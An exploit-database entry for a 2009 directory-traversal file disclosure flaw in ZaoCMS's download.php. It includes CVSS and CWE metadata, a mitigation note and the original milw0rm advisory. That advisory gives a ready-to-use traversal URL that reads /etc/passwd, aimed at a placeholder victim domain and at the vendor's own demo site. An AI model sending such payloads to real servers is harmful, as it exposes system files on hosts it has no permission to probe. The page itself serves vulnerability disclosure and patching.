header-logo
Suggest Exploit
vendor:
ZaoCMS
by:
His0k4, Dr-HTmL, Dos-Dz TeaM, Kondamne, Snakes TeaM ArAb Academy Security Team, and Ev!L-C0d3r.
7,5
CVSS
HIGH
Remote File Disclosure
22 (Improper Limitation of a Pathname to a Restricted Directory)
CWE
Product Name: ZaoCMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

ZaoCMS Remote File Disclosure Vulnerability

A vulnerability in ZaoCMS allows an attacker to remotely disclose files from the server. The vulnerability is caused due to the improper validation of user-supplied input in the 'fichier' and 'Directory' parameters of the 'download.php' script. This can be exploited to disclose arbitrary files from the server by passing directory traversal strings to the 'Directory' parameter.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of ZaoCMS.
Source

Exploit-DB raw data:

--------------------------------------------------------------
ZaoCMS Remote File Disclosure Vulnerability
---------------------------------------------------------------
Founder :ThE g0bL!N
Home:http://www.zaocms.com/
Software : ZaoCMS
Note: The OperatIon Worked By Deleting Your Cookies From The Vuln 1
---------------------------------------------------------------
Exploit:
---------
http://wwww.victim.co.il/admin/functions/PhpCommander/download.php?fichier=passwd&Directory=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F
demo:
-------
http://demo.zaocms.com/admin/functions/PhpCommander/download.php?fichier=passwd&Directory=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F
-----------------------------------------------------------------------------------------------------
His0k4  - Dr-HTmL , Dos-Dz TeaM , Kondamne , Snakes TeaM ArAb Academy Security Team,And Ev!L-C0d3r.
-----------------------------------------------------------------------------------------------------

# milw0rm.com [2009-05-21]

Navigation

Suggest Exploit

Services By CQR